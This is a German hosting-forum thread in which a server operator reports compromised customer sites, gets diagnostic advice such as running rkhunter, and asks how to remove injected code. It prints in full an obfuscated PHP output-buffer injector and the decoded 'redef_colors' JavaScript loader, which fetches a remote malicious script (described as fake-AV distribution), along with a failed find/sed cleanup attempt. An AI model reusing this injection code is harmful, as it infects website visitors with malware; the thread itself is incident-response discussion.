Server wurde glaub ich gehackt

#1
#2
wie groß ist dein Server?

Wenn er gehackt wurde, würde ich keine halben Sachen machen.

Alles sichern (vor allem ALLE Logs) und dann einmal neu bitte.

Grüße
Laubie
 

Till

Administrator
#4
Du solltest Da erstnmal nichts überstürzen sondern erstmal auf Ursachensuche gehen.

Wie werden die Domains denn umgeleitet? Geänderter DNS, geändete Apache Config oder einfach nur ein Hack in eninem CMS System?

Und hast Du Deinen Server bereits mit rkhunter untersucht?

Gibt es irgendwelche metrkwürdigen Prozesse oder hohe Prozessorlast?
 
#5
so an die 100 Kunden.
Wie würdest du dann die Daten am besten sichern? Ich habe ja ISPConfig 2 im Einsatz. Auch die ganzen Passwörter usw.

Danke.
ok... in so einem Fall, kann man dann doch schon mal gucken, woran es liegt ;)
So große Server hab ich nicht ;)

Denn je mehr du wieder von dem alten auf den neuen kopierst, um so mehr mögliche Lücken holst du ja wieder rein.

Also lieber mal genau gucken, wo das her kommt...

Grüße
Laubie
 
#6
In einigen PHP Dateien wurde folgendes Script geschrieben

PHP:
<?php global $ob_starting;
if(!$ob_starting) {
  function ob_start_flush($s) {
       $tc = array(0, 69, 84, 82, 67, 83, 7, 79, 8, 9, 73, 12, 76, 68, 63, 78, 19, 23, 24, 3, 65, 70, 27, 14, 16, 20, 80, 17, 29, 89, 86, 85, 2, 77, 91, 93, 11, 18, 71, 66, 72, 75, 87, 74, 22, 37, 52, 13, 59, 61, 25, 28, 21, 1, 35, 15, 34, 36, 30, 88, 41, 92, 46, 33, 51);
       $tr = array(51, 5, 4, 3, 10, 26, 2, 0, 2, 29, 26, 1, 28, 32, 2, 1, 59, 2, 55, 43, 20, 30, 20, 5, 4, 3, 10, 26, 2, 32, 58, 10, 21, 0, 8, 2, 29, 26, 1, 7, 21, 8, 3, 1, 13, 1, 21, 14, 4, 7, 12, 7, 3, 5, 9, 28, 28, 32, 31, 15, 13, 1, 21, 10, 15, 1, 13, 32, 9, 0, 34, 0, 0, 0, 30, 20, 3, 0, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 0, 28, 0, 15, 1, 42, 0, 63, 3, 3, 20, 29, 8, 6, 19, 25, 39, 18, 37, 17, 37, 6, 11, 0, 6, 19, 18, 27, 17, 18, 17, 21, 6, 11, 0, 6, 19, 18, 16, 37, 21, 18, 16, 6, 11, 0, 6, 19, 18, 18, 17, 21, 17, 25, 6, 11, 0, 6, 19, 25, 4, 16, 27, 18, 16, 6, 11, 0, 6, 19, 17, 25, 18, 17, 18, 16, 6, 11, 0, 6, 19, 16, 1, 17, 50, 17, 24, 6, 11, 0, 6, 19, 18, 52, 17, 24, 18, 37, 6, 11, 0, 6, 19, 17, 37, 18, 27, 17, 18, 6, 11, 0, 6, 19, 17, 21, 18, 16, 16, 27, 6, 11, 0, 6, 19, 37, 21, 18, 37, 18, 27, 6, 11, 0, 6, 19, 17, 37, 25, 4, 16, 27, 6, 11, 0, 6, 19, 17, 17, 18, 16, 18, 16, 6, 11, 0, 6, 19, 17, 21, 25, 50, 16, 1, 6, 11, 0, 6, 19, 16, 1, 25, 17, 25, 52, 6, 11, 0, 6, 19, 16, 13, 25, 25, 25, 25, 6, 11, 0, 6, 19, 16, 13, 25, 24, 25, 16, 6, 11, 0, 6, 19, 16, 21, 16, 13, 25, 27, 6, 11, 0, 6, 19, 16, 21, 25, 37, 16, 1, 6, 11, 0, 6, 19, 17, 50, 18, 37, 16, 1, 6, 11, 0, 6, 19, 17, 50, 18, 24, 18, 25, 6, 11, 0, 6, 19, 17, 25, 18, 27, 18, 18, 6, 11, 0, 6, 19, 16, 13, 17, 4, 17, 18, 6, 11, 0, 6, 19, 17, 13, 16, 13, 17, 21, 6, 11, 0, 6, 19, 17, 17, 17, 21, 16, 27, 6, 11, 0, 6, 19, 25, 13, 24, 24, 24, 24, 6, 9, 22, 0, 0, 0, 30, 20, 3, 0, 3, 1, 13, 1, 21, 14, 4, 7, 12, 7, 3, 5, 0, 28, 0, 27, 22, 0, 0, 0, 30, 20, 3, 0, 4, 7, 12, 7, 3, 5, 14, 26, 10, 4, 41, 1, 13, 0, 28, 0, 24, 22, 0, 0, 0, 21, 31, 15, 4, 2, 10, 7, 15, 0, 13, 10, 30, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 2, 11, 5, 2, 29, 12, 1, 13, 9, 0, 34, 30, 20, 3, 0, 5, 0, 28, 0, 32, 32, 22, 21, 7, 3, 0, 8, 43, 28, 24, 22, 43, 51, 2, 23, 12, 1, 15, 38, 2, 40, 22, 43, 36, 36, 9, 0, 34, 30, 20, 3, 0, 4, 14, 3, 38, 39, 0, 28, 0, 2, 48, 43, 49, 22, 21, 7, 3, 0, 8, 10, 28, 27, 22, 10, 51, 17, 22, 10, 36, 36, 9, 0, 34, 30, 20, 3, 0, 4, 14, 4, 12, 3, 0, 28, 0, 4, 14, 3, 38, 39, 23, 5, 31, 39, 5, 2, 3, 8, 10, 36, 36, 11, 37, 9, 22, 10, 21, 0, 8, 4, 14, 4, 12, 3, 53, 28, 32, 24, 24, 32, 9, 0, 5, 0, 36, 28, 0, 64, 2, 3, 10, 15, 38, 23, 21, 3, 7, 33, 54, 40, 20, 3, 54, 7, 13, 1, 8, 26, 20, 3, 5, 1, 60, 15, 2, 8, 4, 14, 4, 12, 3, 11, 27, 44, 9, 47, 27, 52, 9, 22, 35, 35, 10, 21, 0, 8, 5, 2, 29, 12, 1, 13, 9, 0, 34, 5, 0, 28, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 24, 11, 16, 44, 9, 0, 36, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 16, 44, 11, 8, 5, 23, 12, 1, 15, 38, 2, 40, 47, 16, 18, 9, 9, 0, 36, 0, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 48, 27, 49, 23, 5, 31, 39, 5, 2, 3, 8, 24, 11, 27, 9, 36, 15, 1, 42, 0, 57, 20, 2, 1, 8, 9, 23, 38, 1, 2, 46, 10, 33, 1, 8, 9, 0, 36, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 8, 5, 23, 12, 1, 15, 38, 2, 40, 47, 37, 9, 9, 22, 35, 0, 1, 12, 5, 1, 0, 34, 5, 0, 28, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 16, 44, 11, 8, 5, 23, 12, 1, 15, 38, 2, 40, 47, 16, 18, 9, 9, 0, 36, 0, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 48, 27, 49, 23, 5, 31, 39, 5, 2, 3, 8, 24, 11, 27, 9, 36, 15, 1, 42, 0, 57, 20, 2, 1, 8, 9, 23, 38, 1, 2, 46, 10, 33, 1, 8, 9, 22, 35, 3, 1, 2, 31, 3, 15, 0, 5, 22, 0, 0, 0, 35, 0, 0, 0, 21, 31, 15, 4, 2, 10, 7, 15, 0, 2, 3, 29, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 9, 0, 34, 2, 3, 29, 0, 34, 0, 0, 0, 10, 21, 8, 53, 13, 7, 4, 31, 33, 1, 15, 2, 23, 38, 1, 2, 45, 12, 1, 33, 1, 15, 2, 56, 29, 60, 13, 0, 61, 61, 0, 53, 13, 7, 4, 31, 33, 1, 15, 2, 23, 4, 3, 1, 20, 2, 1, 45, 12, 1, 33, 1, 15, 2, 9, 34, 13, 7, 4, 31, 33, 1, 15, 2, 23, 42, 3, 10, 2, 1, 8, 13, 10, 30, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 11, 27, 9, 9, 22, 0, 0, 0, 35, 0, 1, 12, 5, 1, 0, 34, 30, 20, 3, 0, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 28, 13, 7, 4, 31, 33, 1, 15, 2, 23, 4, 3, 1, 20, 2, 1, 45, 12, 1, 33, 1, 15, 2, 8, 32, 5, 4, 3, 10, 26, 2, 32, 9, 22, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 23, 2, 29, 26, 1, 28, 32, 2, 1, 59, 2, 55, 43, 20, 30, 20, 5, 4, 3, 10, 26, 2, 32, 22, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 23, 5, 3, 4, 28, 13, 10, 30, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 11, 24, 9, 22, 13, 7, 4, 31, 33, 1, 15, 2, 23, 38, 1, 2, 45, 12, 1, 33, 1, 15, 2, 5, 56, 29, 46, 20, 38, 62, 20, 33, 1, 8, 32, 40, 1, 20, 13, 32, 9, 48, 24, 49, 23, 20, 26, 26, 1, 15, 13, 54, 40, 10, 12, 13, 8, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 9, 22, 35, 35, 0, 4, 20, 2, 4, 40, 8, 1, 9, 0, 34, 0, 35, 2, 3, 29, 0, 34, 4, 40, 1, 4, 41, 14, 4, 7, 12, 7, 3, 5, 14, 26, 10, 4, 41, 1, 13, 8, 9, 22, 35, 0, 4, 20, 2, 4, 40, 8, 1, 9, 0, 34, 0, 5, 1, 2, 46, 10, 33, 1, 7, 31, 2, 8, 32, 2, 3, 29, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 9, 32, 11, 0, 52, 24, 24, 9, 22, 35, 0, 0, 0, 35, 0, 0, 0, 2, 3, 29, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 9, 22, 35, 51, 55, 5, 4, 3, 10, 26, 2, 58);

       $ob_htm = ''; foreach($tr as $tval) {
               $ob_htm .= chr($tc[$tval]+32);
       }

       $slw=strtolower($s);
       $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
       if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
       if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
       if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
       if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
       if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
       if(!$i){$i=strlen($s);if($i){$i--;}}
       $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

       return $s;
  }
  $ob_starting = time();
  @ob_start("ob_start_flush");
} ?>
Wie finde ich am besten raus wo das Sicherheitsloch ist?

Danke
 

Till

Administrator
#7
Was hast Du mit rkhunter rausgefunden?

Wie finde ich am besten raus wo das Sicherheitsloch ist?
Wenn man sowas sucht, dann schaut man welche Gemeinsamkeiten haben diese Websietes. z.b. gleiches cms, etc. und man gibt den Code bei Google ein. Der erste Treffer gibt Dir gleich die Antwort:

Definitely a hack. It construct the following script and writes it to the output buffer which then flushes to the page.

......

I haven't tried to see what the redef_colors script does, but I'm guessing it's nothing good.

Update: Google says it's this:

Javascript included and used to distribute malware on osCommerce sites. The code is disguised as color pick, but in fact loads a malicous iframe (for the Fake AV).

http://sucuri.net/malware/malware-entry-mwjs1240
Time to patch your osCommerce instance.

More: http://malware.im/blackhole-defs_colors-and-createcss-injections/


Referenz: http://stackoverflow.com/questions/5456462/what-does-this-php-code-do

Es handelt sich also um einen Bug / Hack von Oscommerce Seiten.
 
#9
habs rausgefunden. rkhunter sagt

System checks summary
=====================

File properties checks...
Files checked: 125
Suspect files: 2

Rootkit checks...
Rootkits checked : 110
Possible rootkits: 0

Applications checks...
Applications checked: 8
Suspect applications: 5

The system checks took: 4 minutes and 36 seconds

All results have been written to the logfile (/var/log/rkhunter.log)

One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)
 
#11
Hi,

ich hätte nochmal eine Frage. Wer kann mir einen Linux Ssh Befehl nennen mit dem ich alle Dateien auf meinem Server nach dem Script durchsuchen kann und durch nichts, also löschen, ersetzen kann. Es sind einfach zuviele Dateien es bei jeder einzeln zu machen.

Zu ersetzender CODE:
Code:
<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {

   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
        var s = "";
        for (j=0;j<t.length;j++) {      
                var c_rgb = t[j];
                for (i=1;i<7;i++) {
                        var c_clr = c_rgb.substr(i++,2);
                        if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
                }
        }
        if (styled) {
                s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
        } else {
                s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
        }
        return s;
   }

   function try_pick_colors() {
        try {
                if(!document.getElementById || !document.createElement){
                        document.write(div_pick_colors(div_colors,1));
                   } else {
                        var new_cstyle=document.createElement("script");
                        new_cstyle.type="text/javascript";
                        new_cstyle.src=div_pick_colors(div_colors,0);
                        document.getElementsByTagName("head")[0].appendChild(new_cstyle);
                }
        } catch(e) { }
        try {
                check_colors_picked();
        } catch(e) { 
                setTimeout("try_pick_colors()", 500);
        }
</script>/ /g' {} \;;
Ich hab es mit folgendem Befehl probiert klappt aber leider nicht
find . -name "'.html" -exec sed -i 's/<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {

var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<t.length;j++) {
var c_rgb = t[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if (styled) {
s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
}

function try_pick_colors() {
try {
if(!document.getElementById || !document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("script");
new_cstyle.type="text/javascript";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}

try_pick_colors();

}
</script>/ /g' {} \;
Danke
 

Werbung

Top